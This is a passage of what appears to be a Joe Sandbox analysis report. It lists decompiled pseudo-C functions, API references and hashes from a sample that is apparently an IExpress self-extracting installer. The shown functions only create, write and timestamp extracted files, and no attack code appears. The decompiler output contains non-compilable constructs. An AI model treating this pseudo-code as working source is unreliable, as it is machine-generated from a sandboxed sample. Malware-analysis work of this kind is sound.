                                                                                                                                                                                                                                              				if(_a4 == 3) {
                                                                                                                                                                                                                                              					_t30 = E001A4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                                                              			}































                                                                                                                                                                                                                                              0x001a4cd0
                                                                                                                                                                                                                                              0x001a4cdb
                                                                                                                                                                                                                                              0x001a4ce0
                                                                                                                                                                                                                                              0x001a4ce2
                                                                                                                                                                                                                                              0x001a4cee
                                                                                                                                                                                                                                              0x001a4cf2
                                                                                                                                                                                                                                              0x001a4d0e
                                                                                                                                                                                                                                              0x001a4d0e
                                                                                                                                                                                                                                              0x001a4d11
                                                                                                                                                                                                                                              0x001a4e83
                                                                                                                                                                                                                                              0x001a4e88
                                                                                                                                                                                                                                              0x001a4e98
                                                                                                                                                                                                                                              0x001a4e98
                                                                                                                                                                                                                                              0x001a4d17
                                                                                                                                                                                                                                              0x001a4d17
                                                                                                                                                                                                                                              0x001a4d1a
                                                                                                                                                                                                                                              0x001a4d2f
                                                                                                                                                                                                                                              0x001a4d2f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d2f
                                                                                                                                                                                                                                              0x001a4d1c
                                                                                                                                                                                                                                              0x001a4d1c
                                                                                                                                                                                                                                              0x001a4d1f
                                                                                                                                                                                                                                              0x001a4dcb
                                                                                                                                                                                                                                              0x001a4dd0
                                                                                                                                                                                                                                              0x001a4dd2
                                                                                                                                                                                                                                              0x001a4ddd
                                                                                                                                                                                                                                              0x001a4ddd
                                                                                                                                                                                                                                              0x001a4de3
                                                                                                                                                                                                                                              0x001a4de8
                                                                                                                                                                                                                                              0x001a4ded
                                                                                                                                                                                                                                              0x001a4ded
                                                                                                                                                                                                                                              0x001a4def
                                                                                                                                                                                                                                              0x001a4df0
                                                                                                                                                                                                                                              0x001a4df0
                                                                                                                                                                                                                                              0x001a4df4
                                                                                                                                                                                                                                              0x001a4df4
                                                                                                                                                                                                                                              0x001a4df6
                                                                                                                                                                                                                                              0x001a4df9
                                                                                                                                                                                                                                              0x001a4dfc
                                                                                                                                                                                                                                              0x001a4dfc
                                                                                                                                                                                                                                              0x001a4dfe
                                                                                                                                                                                                                                              0x001a4dff
                                                                                                                                                                                                                                              0x001a4dff
                                                                                                                                                                                                                                              0x001a4e03
                                                                                                                                                                                                                                              0x001a4e08
                                                                                                                                                                                                                                              0x001a4e0a
                                                                                                                                                                                                                                              0x001a4e0f
                                                                                                                                                                                                                                              0x001a4d03
                                                                                                                                                                                                                                              0x001a4d03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d03
                                                                                                                                                                                                                                              0x001a4e18
                                                                                                                                                                                                                                              0x001a4e20
                                                                                                                                                                                                                                              0x001a4e25
                                                                                                                                                                                                                                              0x001a4e27
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e33
                                                                                                                                                                                                                                              0x001a4e38
                                                                                                                                                                                                                                              0x001a4e3a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e40
                                                                                                                                                                                                                                              0x001a4e51
                                                                                                                                                                                                                                              0x001a4e56
                                                                                                                                                                                                                                              0x001a4e5b
                                                                                                                                                                                                                                              0x001a4e5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e6a
                                                                                                                                                                                                                                              0x001a4e6f
                                                                                                                                                                                                                                              0x001a4e71
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e77
                                                                                                                                                                                                                                              0x001a4e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e7d
                                                                                                                                                                                                                                              0x001a4d25
                                                                                                                                                                                                                                              0x001a4d25
                                                                                                                                                                                                                                              0x001a4d28
                                                                                                                                                                                                                                              0x001a4d36
                                                                                                                                                                                                                                              0x001a4d3b
                                                                                                                                                                                                                                              0x001a4d40
                                                                                                                                                                                                                                              0x001a4d40
                                                                                                                                                                                                                                              0x001a4d42
                                                                                                                                                                                                                                              0x001a4d43
                                                                                                                                                                                                                                              0x001a4d43
                                                                                                                                                                                                                                              0x001a4d47
                                                                                                                                                                                                                                              0x001a4d4a
                                                                                                                                                                                                                                              0x001a4d4a
                                                                                                                                                                                                                                              0x001a4d4c
                                                                                                                                                                                                                                              0x001a4d4f
                                                                                                                                                                                                                                              0x001a4d4f
                                                                                                                                                                                                                                              0x001a4d51
                                                                                                                                                                                                                                              0x001a4d52
                                                                                                                                                                                                                                              0x001a4d52
                                                                                                                                                                                                                                              0x001a4d56
                                                                                                                                                                                                                                              0x001a4d5b
                                                                                                                                                                                                                                              0x001a4d5d
                                                                                                                                                                                                                                              0x001a4d62
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d67
                                                                                                                                                                                                                                              0x001a4d6f
                                                                                                                                                                                                                                              0x001a4d74
                                                                                                                                                                                                                                              0x001a4d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d7c
                                                                                                                                                                                                                                              0x001a4d84
                                                                                                                                                                                                                                              0x001a4d89
                                                                                                                                                                                                                                              0x001a4d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d94
                                                                                                                                                                                                                                              0x001a4d99
                                                                                                                                                                                                                                              0x001a4d9e
                                                                                                                                                                                                                                              0x001a4da1
                                                                                                                                                                                                                                              0x001a4daa
                                                                                                                                                                                                                                              0x001a4daa
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4db5
                                                                                                                                                                                                                                              0x001a4dbb
                                                                                                                                                                                                                                              0x001a4dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4dc3
                                                                                                                                                                                                                                              0x001a4dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4dc5
                                                                                                                                                                                                                                              0x001a4dbd
                                                                                                                                                                                                                                              0x001a4d2a
                                                                                                                                                                                                                                              0x001a4d2a
                                                                                                                                                                                                                                              0x001a4d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d2d
                                                                                                                                                                                                                                              0x001a4cf8
                                                                                                                                                                                                                                              0x001a4cfd
                                                                                                                                                                                                                                              0x001a4d02
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 001A4DB5
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 001A4DDD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFileItemText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 3625706803-3647970563
                                                                                                                                                                                                                                              • Opcode ID: a85a926d71a86bd1cc2f003cafbbaf639000ac06be1e33613b2284b42d51f745
                                                                                                                                                                                                                                              • Instruction ID: 7412cd547b79c0d06294263de803ebedd08ba6d670e93250ccb8747967cea701
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a85a926d71a86bd1cc2f003cafbbaf639000ac06be1e33613b2284b42d51f745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7541133E2001019BCB259FB8DD446F6B3A5FFE7360F044668E88697685DBB1DE8AC750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                                                                                                              				struct _FILETIME _v20;
                                                                                                                                                                                                                                              				FILETIME* _t14;
                                                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t21 + 0x1a8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t14 =  &_v12;
                                                                                                                                                                                                                                              					_t15 = SetFileTime( *(_t21 + 0x1a8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x001a4c40
                                                                                                                                                                                                                                              0x001a4c4a
                                                                                                                                                                                                                                              0x001a4c8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4c70
                                                                                                                                                                                                                                              0x001a4c70
                                                                                                                                                                                                                                              0x001a4c7e
                                                                                                                                                                                                                                              0x001a4c86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4c8a

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32 ref: 001A4C54
                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A4C66
                                                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 001A4C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2071732420-0
                                                                                                                                                                                                                                              • Opcode ID: 40139892bc32ca8a9b17dc7004bc05a4f378c81fcaa4ef9ed5e7deacbdf6829d
                                                                                                                                                                                                                                              • Instruction ID: 0de9f86e2da47bef7592ba365b023c75c6eacc4201a0dbc23bf77d37175e8223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40139892bc32ca8a9b17dc7004bc05a4f378c81fcaa4ef9ed5e7deacbdf6829d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0907660120CBFAB25DFB4CC48EBB7BECEB46360B44052AA819C1054EB70D954C7A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                                                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                              				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                              					asm("sbb esi, esi");
                                                                                                                                                                                                                                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                              						asm("sbb esi, esi");
                                                                                                                                                                                                                                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                              				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                              					return _t7;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A490C(_t11);
                                                                                                                                                                                                                                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x001a4880
                                                                                                                                                                                                                                              0x001a488c
                                                                                                                                                                                                                                              0x001a4894
                                                                                                                                                                                                                                              0x001a48a0
                                                                                                                                                                                                                                              0x001a48c9
                                                                                                                                                                                                                                              0x001a48ce
                                                                                                                                                                                                                                              0x001a48a2
                                                                                                                                                                                                                                              0x001a48a8
                                                                                                                                                                                                                                              0x001a48b7
                                                                                                                                                                                                                                              0x001a48bc
                                                                                                                                                                                                                                              0x001a48aa
                                                                                                                                                                                                                                              0x001a48ac
                                                                                                                                                                                                                                              0x001a48ac
                                                                                                                                                                                                                                              0x001a48a8
                                                                                                                                                                                                                                              0x001a48de
                                                                                                                                                                                                                                              0x001a48e7
                                                                                                                                                                                                                                              0x001a490b
                                                                                                                                                                                                                                              0x001a48ee
                                                                                                                                                                                                                                              0x001a48f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4902

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,001A4A23,?,001A4F67,*MEMCAB,00008000,00000180), ref: 001A48DE
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,001A4F67,*MEMCAB,00008000,00000180), ref: 001A4902
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: f896cd7f5ef600a6ec64b77853f1593b1fe364c024555e1231dc5e1a596c5800
                                                                                                                                                                                                                                              • Instruction ID: 2bb3cd0c92af12bb5d5e12593da431d0e3e1ca1268e99c9c657c88310dacbed2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f896cd7f5ef600a6ec64b77853f1593b1fe364c024555e1231dc5e1a596c5800
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E40124ABE125702AF22440699C88BB7551CCBDB734F1B0234BDEAA66D2D6A84C0482E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 =  *0x1a858c; // 0xc0
                                                                                                                                                                                                                                              				_t9 = E001A3680(_t20);
                                                                                                                                                                                                                                              				if( *0x1a91d8 == 0) {
                                                                                                                                                                                                                                              					_push(_t24);
                                                                                                                                                                                                                                              					_t12 = WriteFile( *(0x1a8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t25 = _a12;
                                                                                                                                                                                                                                              						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              							_t14 =  *0x1a9400; // 0xa2800
                                                                                                                                                                                                                                              							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                              							 *0x1a9400 = _t15;
                                                                                                                                                                                                                                              							if( *0x1a8184 != 0) {
                                                                                                                                                                                                                                              								_t21 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1a93f8, 0);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x001a4ad5
                                                                                                                                                                                                                                              0x001a4adb
                                                                                                                                                                                                                                              0x001a4ae7
                                                                                                                                                                                                                                              0x001a4aee
                                                                                                                                                                                                                                              0x001a4b05
                                                                                                                                                                                                                                              0x001a4b0d
                                                                                                                                                                                                                                              0x001a4b14
                                                                                                                                                                                                                                              0x001a4b1a
                                                                                                                                                                                                                                              0x001a4b1c
                                                                                                                                                                                                                                              0x001a4b21
                                                                                                                                                                                                                                              0x001a4b2a
                                                                                                                                                                                                                                              0x001a4b2f
                                                                                                                                                                                                                                              0x001a4b31
                                                                                                                                                                                                                                              0x001a4b39
                                                                                                                                                                                                                                              0x001a4b54
                                                                                                                                                                                                                                              0x001a4b54
                                                                                                                                                                                                                                              0x001a4b39
                                                                                                                                                                                                                                              0x001a4b2f
                                                                                                                                                                                                                                              0x001a4b0f
                                                                                                                                                                                                                                              0x001a4b0f
                                                                                                                                                                                                                                              0x001a4b0f
                                                                                                                                                                                                                                              0x001a4b5e
                                                                                                                                                                                                                                              0x001a4ae9
                                                                                                                                                                                                                                              0x001a4aed
                                                                                                                                                                                                                                              0x001a4aed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001A369F
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36B2
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36DA
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 001A4B05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                              • Opcode ID: 7b9a1f21e3af73f8f59e5cb1115f108936900961f7dace4801b53bc335ef4321
                                                                                                                                                                                                                                              • Instruction ID: 00e861371826e669633648ed5e9268b31d783c7f1fbb20601d3f2919531567aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9a1f21e3af73f8f59e5cb1115f108936900961f7dace4801b53bc335ef4321
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C501B135200201ABDB158F68DC05BA27B69FB8A735F148225F93A9B5F0CBB0DC91CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                                                                              				char* _t6;
                                                                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				char* _t19;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                                                                                              				_t17 = __ecx;
                                                                                                                                                                                                                                              				_t1 = _t17 + 1; // 0x1a8b3f
                                                                                                                                                                                                                                              				_t12 = _t1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t4 =  *_t17;
                                                                                                                                                                                                                                              					_t17 = _t17 + 1;
                                                                                                                                                                                                                                              				} while (_t4 != 0);
                                                                                                                                                                                                                                              				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                              				_t2 = _t18 + 1; // 0x1a8b40
                                                                                                                                                                                                                                              				if(_t2 < __edx) {
                                                                                                                                                                                                                                              					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                              					if(_t19 > __ecx) {
                                                                                                                                                                                                                                              						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                              						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                              							 *_t19 = 0x5c;
                                                                                                                                                                                                                                              							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t6 = _a4;
                                                                                                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                                                                                                              					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                              						_t6 = _t6 + 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return E001A16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0x8007007a;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x001a6592
                                                                                                                                                                                                                                              0x001a6594
                                                                                                                                                                                                                                              0x001a6596
                                                                                                                                                                                                                                              0x001a6598
                                                                                                                                                                                                                                              0x001a6598
                                                                                                                                                                                                                                              0x001a659b
                                                                                                                                                                                                                                              0x001a659b
                                                                                                                                                                                                                                              0x001a659d
                                                                                                                                                                                                                                              0x001a659e
                                                                                                                                                                                                                                              0x001a65a2
                                                                                                                                                                                                                                              0x001a65a4
                                                                                                                                                                                                                                              0x001a65a9
                                                                                                                                                                                                                                              0x001a65b2
                                                                                                                                                                                                                                              0x001a65b6
                                                                                                                                                                                                                                              0x001a65ba
                                                                                                                                                                                                                                              0x001a65c3
                                                                                                                                                                                                                                              0x001a65c5
                                                                                                                                                                                                                                              0x001a65c8
                                                                                                                                                                                                                                              0x001a65c8
                                                                                                                                                                                                                                              0x001a65c3
                                                                                                                                                                                                                                              0x001a65c9
                                                                                                                                                                                                                                              0x001a65cc
                                                                                                                                                                                                                                              0x001a65d2
                                                                                                                                                                                                                                              0x001a65d1
                                                                                                                                                                                                                                              0x001a65d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a65dc
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A8B3E,001A8B3F,00000001,001A8B3E,-00000003,?,001A60EC,001A1140,?), ref: 001A65BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: 7537072d1c9024048fb0949b8bf36b282461c6ef012709c294d62de3b9bcb20a
                                                                                                                                                                                                                                              • Instruction ID: b9347710cae52bf2073b0f564e0a128e2f45408886c368a61c562e1378bb3875
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7537072d1c9024048fb0949b8bf36b282461c6ef012709c294d62de3b9bcb20a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF04276D042509FD335451D9884B76BFDDDB97390F1D015EE8DEC3209DB554C4683A4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E001A597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
